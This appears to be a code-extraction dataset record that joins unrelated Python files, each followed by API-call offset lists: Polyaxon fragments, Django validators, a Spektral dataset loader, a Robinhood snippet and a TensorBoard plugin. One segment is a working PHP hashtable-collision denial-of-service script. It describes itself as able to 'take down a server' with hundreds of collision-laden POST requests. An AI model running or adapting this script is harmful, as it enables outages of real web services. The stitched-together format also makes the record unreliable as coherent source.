'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (36326, 36383), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((38397, 38489), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (38432, 38489), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((38924, 39016), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (38959, 39016), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((40198, 40290), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (40233, 40290), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((40709, 40801), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (40744, 40801), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((41739, 41824), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'None'}), '(config=self.compiled_operation, preset=None\n )\n', (41774, 41824), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((42061, 42153), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (42096, 42153), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((43202, 43294), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (43237, 43294), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((44777, 44869), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (44812, 44869), False, 'from polyaxon.polyaxonfile import OperationSpecification\n'), ((46035, 46127), 'polyaxon.polyaxonfile.OperationSpecification.apply_preset', 'OperationSpecification.apply_preset', ([], {'config': 'self.compiled_operation', 'preset': 'self.preset'}), '(config=self.compiled_operation, preset=\n self.preset)\n', (46070, 46127), False, 'from polyaxon.polyaxonfile import OperationSpecification\n')]
|
#! /usr/bin/env python
###########################
# Copyrights Please #
###########################
###########################
# My Original Code #
###########################
# WhoAmi :
#https://www.facebook.com/Gods.nd.kings
#https://www.facebook.com/clayteamwhoami
"""
Examples:
-) Make a single Request, wait for the response and save the response to output0.html
python Hashtable.py -u https://host/index.php -v -c 1 -w -o output -t PHP
-) Take down a server(make 500 requests without waiting for a response):
python Hashtable.py -u https://host/index.php -v -c 500 -t PHP
Changelog:
v5.0: Define max payload size as parameter
v4.0: Get PHP Collision Chars on the fly
v3.0: Load Payload from file
v2.0: Added Support for https, switched to HTTP 1.1
v1.0: Initial Release
"""
#############################
# LIBRARIES #
#############################
import socket
import sys, os
import sys
import math
import urllib
import string
import time
import urlparse
import argparse
import ssl
import random
import itertools
####################
# Main #
####################
def main():
parser = argparse.ArgumentParser(description="| Take down a remote PHP Host |"
"| Coder Name : WhoAmi |"
"| Team Name : <NAME> |"
,prog="PHP Hashtable Exploit3r v1.0")
parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
parser.add_argument("-s", "--save", dest="save", help="Save payload to file")
parser.add_argument("-p", "--payload", dest="payload", help="Save payload to file")
parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
parser.add_argument("-t", "--target", dest="target", help="Target of the attack", choices=["ASP", "PHP", "JAVA"], required=True)
parser.add_argument("-m", "--max-payload-size", dest="maxpayloadsize", help="Maximum size of the Payload in Megabyte. PHPs defaultconfiguration does not allow more than 8MB", default=8, type=int)
parser.add_argument("--version", action="version", version="%(prog)s 5.0")
#############################
# FUNCTIONS #
#############################
options = parser.parse_args()
url = urlparse.urlparse(options.url)
if not url.scheme:
print("Please provide a scheme to the URL(http://, https://,..")
sys.exit(1)
host = url.hostname
path = url.path
port = url.port
if not port:
if url.scheme == "https":
port = 443
elif url.scheme == "http":
port = 80
else:
print("Unsupported Protocol %s" % url.scheme)
sys.exit(1)
if not path:
path = "/"
if not options.payload:
print("Generating Payload...")
if options.target == "PHP":
payload = generatePHPPayload()
elif options.target == "ASP":
#payload = generateASPPayload()
print("Target %s not yet implemented" % options.target)
sys.exit(1)
elif options.target == "JAVA":
#payload = generateJAVAPayload()
print("Target %s not yet implemented" % options.target)
sys.exit(1)
else:
print("Target %s not yet implemented" % options.target)
sys.exit(1)
print("Payload generated")
if options.save:
f = open(options.save, "w")
f.write(payload)
f.close()
print("Payload saved to %s" % options.save)
else:
f = open(options.payload, "r")
payload = f.read()
f.close()
print("Loaded Payload from %s" % options.payload)
# trim to maximum payload size (in MB)
maxinmb = options.maxpayloadsize*1024*1024
payload = payload[:maxinmb]
print("Host: %s" % host)
print("Port: %s" % str(port))
print("path: %s" % path)
print
print
for i in range(options.count):
print("sending Request #%s..." % str(i+1))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if url.scheme == "https":
ssl_sock = ssl.wrap_socket(sock)
ssl_sock.connect((host, port))
ssl_sock.settimeout(None)
else:
sock.connect((host, port))
sock.settimeout(None)
request = "POST %s HTTP/1.1\r\n\
Host: %s\r\n\
Content-Type: application/x-www-form-urlencoded\r\n\
Connection: Close\r\n\
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n\
Content-Length: %s\r\n\
\r\n\
%s\r\n\
\r\n" % (path, host, str(len(payload)), payload)
if url.scheme == "https":
ssl_sock.send(request)
else:
sock.send(request)
if options.verbose:
if len(request) > 400:
print(request[:400]+"....")
else:
print(request)
print("")
if options.wait or options.output:
start = time.time()
if url.scheme == "https":
data = ssl_sock.recv(1024)
string = ""
while len(data):
string = string + data
data = ssl_sock.recv(1024)
else:
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
elapsed = (time.time() - start)
print("Request %s finished" % str(i+1))
print("Request %s duration: %s" % (str(i+1), elapsed))
split = string.partition("\r\n\r\n")
header = split[0]
content = split[2]
if options.verbose:
# only print http header
print("")
print(header)
print("")
if options.output:
f = open(options.output+str(i)+".html", "w")
f.write("<!-- "+header+" -->\r\n"+content)
f.close()
if url.scheme == "https":
ssl_sock.close()
sock.close()
else:
sock.close()
def generateASPPayload():
return "a=a"
def generateJAVAPayload():
return "b=b"
def generatePHPPayload():
# Note: Default max POST Data Length in PHP is 8388608 bytes (8MB)
# compute entries with collisions in PHP hashtable hash function
a = computePHPCollisionChars(5)
return _generatePayload(a, 8);
def _generatePayload(collisionchars, payloadlength):
# Taken from:
# https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
# how long should the payload be
length = payloadlength
size = len(collisionchars)
post = ""
maxvaluefloat = math.pow(size,length)
maxvalueint = int(math.floor(maxvaluefloat))
for i in range (maxvalueint):
inputstring = _base_convert(i, size)
result = inputstring.rjust(length, "0")
for item in collisionchars:
result = result.replace(str(item), collisionchars[item])
post += "" + urllib.quote(result) + "=&"
return post;
def _base_convert(num, base):
fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
alphabet = fullalphabet[:base]
if (num == 0):
return alphabet[0]
arr = []
base = len(alphabet)
while num:
rem = num % base
num = num // base
arr.append(alphabet[rem])
arr.reverse()
return "".join(arr)
def computePHPCollisionChars(count):
hashes = {}
counter = 0
length = 2
a = ""
for i in range(1, 254):
a = a+chr(i)
source = list(itertools.product(a, repeat=length))
basestr = ''.join(random.choice(source))
basehash = _DJBX33A(basestr)
print("\tValue: %s\tHash: %s" % (basestr, basehash))
hashes[str(counter)] = basestr
counter = counter + 1
for item in source:
tempstr = ''.join(item)
if tempstr == basestr:
continue
temphash = _DJBX33A(tempstr)
if temphash == basehash:
print("\tValue: %s\tHash: %s" % (tempstr, temphash))
hashes[str(counter)] = tempstr
counter = counter + 1
if counter >= count:
break;
if counter != count:
print("Not enough values found. Please start the script again")
sys.exit(1)
return hashes
def _DJBX(inputstring, base, start):
counter = len(inputstring) - 1
result = start
for item in inputstring:
result = result + (math.pow(base, counter) * ord(item))
counter = counter - 1
return int(round(result))
#PHP
def _DJBX33A(inputstring):
return _DJBX(inputstring, 33, 5381)
#ASP
def _DJBX33X(inputstring):
counter = len(inputstring) - 1
result = 5381
for item in inputstring:
result = result + (int(round(math.pow(33, counter))) ^ ord(item))
counter = counter - 1
return int(round(result))
if __name__ == "__main__":
main()
|
[
"argparse.ArgumentParser",
"math.pow",
"urllib.quote",
"socket.socket",
"math.floor",
"random.choice",
"time.time",
"urlparse.urlparse",
"ssl.wrap_socket",
"itertools.product",
"sys.exit",
"string.partition"
] |
[((1149, 1346), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""| Take down a remote PHP Host || Coder Name : WhoAmi || Team Name : <NAME> |"""', 'prog': '"""PHP Hashtable Exploit3r v1.0"""'}), "(description=\n '| Take down a remote PHP Host || Coder Name : WhoAmi || Team Name : <NAME> |'\n , prog='PHP Hashtable Exploit3r v1.0')\n", (1172, 1346), False, 'import argparse\n'), ((2758, 2788), 'urlparse.urlparse', 'urlparse.urlparse', (['options.url'], {}), '(options.url)\n', (2775, 2788), False, 'import urlparse\n'), ((7361, 7383), 'math.pow', 'math.pow', (['size', 'length'], {}), '(size, length)\n', (7369, 7383), False, 'import math\n'), ((2894, 2905), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (2902, 2905), False, 'import sys\n'), ((4540, 4589), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (4553, 4589), False, 'import socket\n'), ((7405, 7430), 'math.floor', 'math.floor', (['maxvaluefloat'], {}), '(maxvaluefloat)\n', (7415, 7430), False, 'import math\n'), ((8270, 8305), 'itertools.product', 'itertools.product', (['a'], {'repeat': 'length'}), '(a, repeat=length)\n', (8287, 8305), False, 'import itertools\n'), ((8329, 8350), 'random.choice', 'random.choice', (['source'], {}), '(source)\n', (8342, 8350), False, 'import random\n'), ((8978, 8989), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (8986, 8989), False, 'import sys\n'), ((4647, 4668), 'ssl.wrap_socket', 'ssl.wrap_socket', (['sock'], {}), '(sock)\n', (4662, 4668), False, 'import ssl\n'), ((5550, 5561), 'time.time', 'time.time', ([], {}), '()\n', (5559, 5561), False, 'import time\n'), ((6194, 6222), 'string.partition', 'string.partition', (["'\\r\\n\\r\\n'"], {}), "('\\r\\n\\r\\n')\n", (6210, 6222), False, 'import string\n'), ((3186, 3197), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3194, 3197), False, 'import sys\n'), ((3544, 3555), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3552, 3555), False, 'import sys\n'), ((6034, 6045), 'time.time', 'time.time', ([], {}), '()\n', (6043, 6045), False, 'import time\n'), ((7685, 7705), 'urllib.quote', 'urllib.quote', (['result'], {}), '(result)\n', (7697, 7705), False, 'import urllib\n'), ((9156, 9179), 'math.pow', 'math.pow', (['base', 'counter'], {}), '(base, counter)\n', (9164, 9179), False, 'import math\n'), ((3720, 3731), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3728, 3731), False, 'import sys\n'), ((3826, 3837), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3834, 3837), False, 'import sys\n'), ((9478, 9499), 'math.pow', 'math.pow', (['(33)', 'counter'], {}), '(33, counter)\n', (9486, 9499), False, 'import math\n')]
|
from Robinhood import Robinhood
from pprint import pprint
class Usage(Robinhood):
async def main(self):
await self.login()
options_dict = await self.get_option_positions_from_account()
pprint(options_dict)
if __name__ == '__main__':
instance = Usage()
|
[
"pprint.pprint"
] |
[((216, 236), 'pprint.pprint', 'pprint', (['options_dict'], {}), '(options_dict)\n', (222, 236), False, 'from pprint import pprint\n')]
|
# use click
# specify environment and agent
# tell it to explore
# once it is done, you can inspect it's mind
# you can reset it's location in env
# you can tell it to move to new location
def demo():
''' demo mode is highly limited, made for demo '''
from sensorimotor.lib import MetaEnvironment
MetaEnvironment()
if __name__ == '__main__':
demo()
|
[
"sensorimotor.lib.MetaEnvironment"
] |
[((311, 328), 'sensorimotor.lib.MetaEnvironment', 'MetaEnvironment', ([], {}), '()\n', (326, 328), False, 'from sensorimotor.lib import MetaEnvironment\n')]
|
from django.core.validators import RegexValidator
from django.utils.translation import gettext_lazy as _
"""
Algerian phone numbers validator.
"""
phone_validator = RegexValidator('^\\+?[0-9]{,12}$', _('The phone number you entered is not valid '
'it must be of the international format.'
'example \'+213799136332\''),
'Invalid PhoneNumber')
"""
username validator for alphanumeric usernames starting with a letter and contains only an underscore as a special
character
"""
username_validator = RegexValidator('^[a-zA-Z]{1}[a-zA-Z_0-9]{6,}$', _('The username you entered is not valid '
'the allowed characters are:\n '
'a-z, A-Z, 0-9, \'_\''), 'Invalid Username')
"""
8 chars length password validator.
"""
password_validator = RegexValidator('.{8,}', _('Invalid password. Password must at least contain 8'
' characters.'), 'Invalid Password')
"""
Names validator, allows only letters and spaces, cannot be blank.
"""
names_validator: RegexValidator = RegexValidator('^[a-zA-Z]+( [a-zA-Z]+)*$', _('Invalid name, names must contain only '
'Alphabetic characters, '
'without leading or '
'trailing spaces.'), 'Invalid Name')
"""
address validator, still under development.
"""
address_validator = RegexValidator('^[0-9]{,5}[,. ]{,1}[ a-zA-Z]{5,}([0-9]{,5}[ a-zA-Z]{5,})?$',
_('Invalid address, i\'m sorry i can\'t explain the pattern here.'),
'Invalid Address')
"""
Algerian Registre Commerce number validator.
"""
register_validator = RegexValidator('^[0-9]{2}[a-zA-Z][0-9]{7}$', _('Invalid commerce register number or wrong format,'
' the format should be'
' "XXYXXXXXXX" (X=number, Y=Alphabet) '))
"""
Algerian Numero D'identifiant Fiscal validator.
"""
nif_validator = RegexValidator('^[0-9]{15}$', _('Invalid NIF number ,'
' the format should be'
' "XXXXXXXXXXXXXXX" (X=number) '))
|
[
"django.utils.translation.gettext_lazy"
] |
[((201, 315), 'django.utils.translation.gettext_lazy', '_', (['"""The phone number you entered is not valid it must be of the international format.example \'+213799136332\'"""'], {}), '("The phone number you entered is not valid it must be of the international format.example \'+213799136332\'"\n )\n', (202, 315), True, 'from django.utils.translation import gettext_lazy as _\n'), ((688, 787), 'django.utils.translation.gettext_lazy', '_', (['"""The username you entered is not valid the allowed characters are:\n a-z, A-Z, 0-9, \'_\'"""'], {}), '("""The username you entered is not valid the allowed characters are:\n a-z, A-Z, 0-9, \'_\'"""\n )\n', (689, 787), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1040, 1107), 'django.utils.translation.gettext_lazy', '_', (['"""Invalid password. Password must at least contain 8 characters."""'], {}), "('Invalid password. Password must at least contain 8 characters.')\n", (1041, 1107), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1331, 1437), 'django.utils.translation.gettext_lazy', '_', (['"""Invalid name, names must contain only Alphabetic characters, without leading or trailing spaces."""'], {}), "('Invalid name, names must contain only Alphabetic characters, without leading or trailing spaces.'\n )\n", (1332, 1437), True, 'from django.utils.translation import gettext_lazy as _\n'), ((1881, 1946), 'django.utils.translation.gettext_lazy', '_', (['"""Invalid address, i\'m sorry i can\'t explain the pattern here."""'], {}), '("Invalid address, i\'m sorry i can\'t explain the pattern here.")\n', (1882, 1946), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2123, 2240), 'django.utils.translation.gettext_lazy', '_', (['"""Invalid commerce register number or wrong format, the format should be "XXYXXXXXXX" (X=number, Y=Alphabet) """'], {}), '(\'Invalid commerce register number or wrong format, the format should be "XXYXXXXXXX" (X=number, Y=Alphabet) \'\n )\n', (2124, 2240), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2481, 2557), 'django.utils.translation.gettext_lazy', '_', (['"""Invalid NIF number , the format should be "XXXXXXXXXXXXXXX" (X=number) """'], {}), '(\'Invalid NIF number , the format should be "XXXXXXXXXXXXXXX" (X=number) \')\n', (2482, 2557), True, 'from django.utils.translation import gettext_lazy as _\n')]
|
import os
import shutil
import zipfile
import networkx as nx
import numpy as np
import pandas as pd
import requests
from sklearn.preprocessing import OneHotEncoder, StandardScaler
from spektral.utils import nx_to_numpy
DATASET_URL = 'https://ls11-www.cs.tu-dortmund.de/people/morris/graphkerneldatasets'
DATASET_CLEAN_URL = 'https://raw.githubusercontent.com/nd7141/graph_datasets/master/datasets'
DATA_PATH = os.path.expanduser('~/.spektral/datasets/')
AVAILABLE_DATASETS = [
d[:-4]
for d in pd.read_html(DATASET_URL)[0].Name[2:-1].values.tolist()
]
def load_data(dataset_name, normalize_features=None, clean=False):
"""
Loads one of the Benchmark Data Sets for Graph Kernels from TU Dortmund
([link](https://ls11-www.cs.tu-dortmund.de/staff/morris/graphkerneldatasets)).
The node features are computed by concatenating the following features for
each node:
- node attributes, if available, normalized as specified in `normalize_features`;
- clustering coefficient, normalized with z-score;
- node degrees, normalized as specified in `normalize_features`;
- node labels, if available, one-hot encoded.
:param dataset_name: name of the dataset to load (see `spektral.datasets.tud.AVAILABLE_DATASETS`).
:param normalize_features: `None`, `'zscore'` or `'ohe'`, how to normalize
the node features (only works for node attributes).
:param clean: if True, return a version of the dataset with no isomorphic
graphs.
:return:
- a list of adjacency matrices;
- a list of node feature matrices;
- a numpy array containing the one-hot encoded targets.
"""
if dataset_name not in AVAILABLE_DATASETS:
raise ValueError('Available datasets: {}'.format(AVAILABLE_DATASETS))
if clean:
dataset_name += '_clean'
if not os.path.exists(DATA_PATH + dataset_name):
_download_data(dataset_name)
# Read data
nx_graphs, y = _read_graphs(dataset_name)
# Preprocessing
y = np.array(y)[..., None]
y = OneHotEncoder(sparse=False, categories='auto').fit_transform(y)
# Get node attributes
try:
A, X_attr, _ = nx_to_numpy(nx_graphs, nf_keys=['attributes'], auto_pad=False)
X_attr = _normalize_node_features(X_attr, normalize_features)
except KeyError:
print('Featureless nodes')
A, X_attr, _ = nx_to_numpy(nx_graphs, auto_pad=False)
# Get clustering coefficients (always zscore norm)
clustering_coefficients = [np.array(list(nx.clustering(g).values()))[..., None] for g in nx_graphs]
clustering_coefficients = _normalize_node_features(clustering_coefficients, 'zscore')
# Get node degrees
node_degrees = np.array([np.sum(_, axis=-1, keepdims=True) for _ in A])
node_degrees = _normalize_node_features(node_degrees, 'zscore')
# Get node labels
try:
_, X_labs, _ = nx_to_numpy(nx_graphs, nf_keys=['label'], auto_pad=False)
X_labs = _normalize_node_features(X_labs, 'ohe')
except KeyError:
print('Label-less nodes')
X_labs = None
# Concatenate features
Xs = [node_degrees, clustering_coefficients]
if X_attr is not None:
Xs.append(X_attr)
if X_labs is not None:
Xs.append(X_labs)
X = [np.concatenate(x_, axis=-1) for x_ in zip(*Xs)]
X = np.array(X)
return A, X, y
def _read_graphs(dataset_name):
file_prefix = DATA_PATH + dataset_name + '/' + dataset_name
with open(file_prefix + "_graph_indicator.txt", "r") as f:
graph_indicator = [int(i) - 1 for i in list(f)]
# Nodes
num_graphs = max(graph_indicator)
node_indices = []
offset = []
c = 0
for i in range(num_graphs + 1):
offset.append(c)
c_i = graph_indicator.count(i)
node_indices.append((c, c + c_i - 1))
c += c_i
graph_list = []
vertex_list = []
for i in node_indices:
g = nx.Graph(directed=False)
vertex_list_g = []
for j in range(i[1] - i[0] + 1):
vertex_list_g.append(g.add_node(j))
graph_list.append(g)
vertex_list.append(vertex_list_g)
# Edges
with open(file_prefix + "_A.txt", "r") as f:
edges = [i.strip().split(',') for i in list(f)]
edges = [(int(e[0].strip()) - 1, int(e[1].strip()) - 1) for e in edges]
edge_indicator = []
edge_list = []
for e in edges:
g_id = graph_indicator[e[0]]
edge_indicator.append(g_id)
g = graph_list[g_id]
off = offset[g_id]
# Avoid multigraph
edge_list.append(g.add_edge(e[0] - off, e[1] - off))
# Node labels
if os.path.exists(file_prefix + "_node_labels.txt"):
with open(file_prefix + "_node_labels.txt", "r") as f:
node_labels = [int(i.strip()) for i in list(f)]
i = 0
for g in graph_list:
for n in g.nodes():
g.nodes[n]['label'] = node_labels[i]
i += 1
# Node Attributes
if os.path.exists(file_prefix + "_node_attributes.txt"):
with open(file_prefix + "_node_attributes.txt", "r") as f:
node_attributes = [map(float, i.strip().split(',')) for i in list(f)]
i = 0
for g in graph_list:
for n in g.nodes():
g.nodes[n]['attributes'] = list(node_attributes[i])
i += 1
# Classes
with open(file_prefix + "_graph_labels.txt", "r") as f:
classes = [int(float(i.strip())) for i in list(f)]
return graph_list, classes
def _download_data(dataset_name):
print('Dowloading ' + dataset_name + ' dataset.')
if dataset_name.endswith('_clean'):
true_name = dataset_name[:-6]
url = DATASET_CLEAN_URL
else:
true_name = dataset_name
url = DATASET_URL
data_url = '{}/{}.zip'.format(url, true_name)
req = requests.get(data_url)
os.makedirs(DATA_PATH, exist_ok=True)
with open(DATA_PATH + dataset_name + '.zip', 'wb') as out_file:
out_file.write(req.content)
with zipfile.ZipFile(DATA_PATH + dataset_name + '.zip', 'r') as zip_ref:
zip_ref.extractall(DATA_PATH + dataset_name + '/')
os.remove(DATA_PATH + dataset_name + '.zip')
subfolder = os.path.join(DATA_PATH, dataset_name, true_name)
parentfolder = os.path.join(DATA_PATH, dataset_name)
for filename in os.listdir(subfolder):
try:
suffix = filename.split(true_name)[1]
except IndexError:
# Probably the README
continue
shutil.move(
os.path.join(subfolder, filename),
os.path.join(parentfolder, dataset_name + suffix)
)
shutil.rmtree(subfolder)
def _normalize_node_features(feat_list, norm=None):
"""
Apply one-hot encoding or z-score to a list of node features
"""
if norm == 'ohe':
fnorm = OneHotEncoder(sparse=False, categories='auto')
elif norm == 'zscore':
fnorm = StandardScaler()
else:
return feat_list
fnorm.fit(np.vstack(feat_list))
feat_list = [fnorm.transform(feat_.astype(np.float32)) for feat_ in feat_list]
return feat_list
|
[
"os.remove",
"numpy.sum",
"sklearn.preprocessing.StandardScaler",
"shutil.rmtree",
"os.path.join",
"os.path.exists",
"requests.get",
"networkx.clustering",
"spektral.utils.nx_to_numpy",
"sklearn.preprocessing.OneHotEncoder",
"os.listdir",
"numpy.vstack",
"numpy.concatenate",
"pandas.read_html",
"zipfile.ZipFile",
"os.makedirs",
"numpy.array",
"networkx.Graph",
"os.path.expanduser"
] |
[((413, 456), 'os.path.expanduser', 'os.path.expanduser', (['"""~/.spektral/datasets/"""'], {}), "('~/.spektral/datasets/')\n", (431, 456), False, 'import os\n'), ((3310, 3321), 'numpy.array', 'np.array', (['X'], {}), '(X)\n', (3318, 3321), True, 'import numpy as np\n'), ((4619, 4667), 'os.path.exists', 'os.path.exists', (["(file_prefix + '_node_labels.txt')"], {}), "(file_prefix + '_node_labels.txt')\n", (4633, 4667), False, 'import os\n'), ((4974, 5026), 'os.path.exists', 'os.path.exists', (["(file_prefix + '_node_attributes.txt')"], {}), "(file_prefix + '_node_attributes.txt')\n", (4988, 5026), False, 'import os\n'), ((5839, 5861), 'requests.get', 'requests.get', (['data_url'], {}), '(data_url)\n', (5851, 5861), False, 'import requests\n'), ((5867, 5904), 'os.makedirs', 'os.makedirs', (['DATA_PATH'], {'exist_ok': '(True)'}), '(DATA_PATH, exist_ok=True)\n', (5878, 5904), False, 'import os\n'), ((6149, 6193), 'os.remove', 'os.remove', (["(DATA_PATH + dataset_name + '.zip')"], {}), "(DATA_PATH + dataset_name + '.zip')\n", (6158, 6193), False, 'import os\n'), ((6211, 6259), 'os.path.join', 'os.path.join', (['DATA_PATH', 'dataset_name', 'true_name'], {}), '(DATA_PATH, dataset_name, true_name)\n', (6223, 6259), False, 'import os\n'), ((6279, 6316), 'os.path.join', 'os.path.join', (['DATA_PATH', 'dataset_name'], {}), '(DATA_PATH, dataset_name)\n', (6291, 6316), False, 'import os\n'), ((6337, 6358), 'os.listdir', 'os.listdir', (['subfolder'], {}), '(subfolder)\n', (6347, 6358), False, 'import os\n'), ((6649, 6673), 'shutil.rmtree', 'shutil.rmtree', (['subfolder'], {}), '(subfolder)\n', (6662, 6673), False, 'import shutil\n'), ((1821, 1861), 'os.path.exists', 'os.path.exists', (['(DATA_PATH + dataset_name)'], {}), '(DATA_PATH + dataset_name)\n', (1835, 1861), False, 'import os\n'), ((1992, 2003), 'numpy.array', 'np.array', (['y'], {}), '(y)\n', (2000, 2003), True, 'import numpy as np\n'), ((2146, 2208), 'spektral.utils.nx_to_numpy', 'nx_to_numpy', (['nx_graphs'], {'nf_keys': "['attributes']", 'auto_pad': '(False)'}), "(nx_graphs, nf_keys=['attributes'], auto_pad=False)\n", (2157, 2208), False, 'from spektral.utils import nx_to_numpy\n'), ((2870, 2927), 'spektral.utils.nx_to_numpy', 'nx_to_numpy', (['nx_graphs'], {'nf_keys': "['label']", 'auto_pad': '(False)'}), "(nx_graphs, nf_keys=['label'], auto_pad=False)\n", (2881, 2927), False, 'from spektral.utils import nx_to_numpy\n'), ((3254, 3281), 'numpy.concatenate', 'np.concatenate', (['x_'], {'axis': '(-1)'}), '(x_, axis=-1)\n', (3268, 3281), True, 'import numpy as np\n'), ((3903, 3927), 'networkx.Graph', 'nx.Graph', ([], {'directed': '(False)'}), '(directed=False)\n', (3911, 3927), True, 'import networkx as nx\n'), ((6018, 6073), 'zipfile.ZipFile', 'zipfile.ZipFile', (["(DATA_PATH + dataset_name + '.zip')", '"""r"""'], {}), "(DATA_PATH + dataset_name + '.zip', 'r')\n", (6033, 6073), False, 'import zipfile\n'), ((6847, 6893), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'sparse': '(False)', 'categories': '"""auto"""'}), "(sparse=False, categories='auto')\n", (6860, 6893), False, 'from sklearn.preprocessing import OneHotEncoder, StandardScaler\n'), ((7003, 7023), 'numpy.vstack', 'np.vstack', (['feat_list'], {}), '(feat_list)\n', (7012, 7023), True, 'import numpy as np\n'), ((2023, 2069), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'sparse': '(False)', 'categories': '"""auto"""'}), "(sparse=False, categories='auto')\n", (2036, 2069), False, 'from sklearn.preprocessing import OneHotEncoder, StandardScaler\n'), ((2358, 2396), 'spektral.utils.nx_to_numpy', 'nx_to_numpy', (['nx_graphs'], {'auto_pad': '(False)'}), '(nx_graphs, auto_pad=False)\n', (2369, 2396), False, 'from spektral.utils import nx_to_numpy\n'), ((2700, 2733), 'numpy.sum', 'np.sum', (['_'], {'axis': '(-1)', 'keepdims': '(True)'}), '(_, axis=-1, keepdims=True)\n', (2706, 2733), True, 'import numpy as np\n'), ((6538, 6571), 'os.path.join', 'os.path.join', (['subfolder', 'filename'], {}), '(subfolder, filename)\n', (6550, 6571), False, 'import os\n'), ((6585, 6634), 'os.path.join', 'os.path.join', (['parentfolder', '(dataset_name + suffix)'], {}), '(parentfolder, dataset_name + suffix)\n', (6597, 6634), False, 'import os\n'), ((6937, 6953), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (6951, 6953), False, 'from sklearn.preprocessing import OneHotEncoder, StandardScaler\n'), ((2498, 2514), 'networkx.clustering', 'nx.clustering', (['g'], {}), '(g)\n', (2511, 2514), True, 'import networkx as nx\n'), ((504, 529), 'pandas.read_html', 'pd.read_html', (['DATASET_URL'], {}), '(DATASET_URL)\n', (516, 529), True, 'import pandas as pd\n')]
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The TensorBoard Debugger V2 plugin."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from werkzeug import wrappers
from tensorboard import plugin_util
from tensorboard.plugins import base_plugin
from tensorboard.plugins.debugger_v2 import debug_data_provider
from tensorboard.backend import http_util
def _missing_run_error_response(request):
return http_util.Respond(
request,
{"error": "run parameter is not provided"},
"application/json",
code=400,
)
class DebuggerV2Plugin(base_plugin.TBPlugin):
"""Debugger V2 Plugin for TensorBoard."""
plugin_name = debug_data_provider.PLUGIN_NAME
def __init__(self, context):
"""Instantiates Debugger V2 Plugin via TensorBoard core.
Args:
context: A base_plugin.TBContext instance.
"""
super(DebuggerV2Plugin, self).__init__(context)
self._logdir = context.logdir
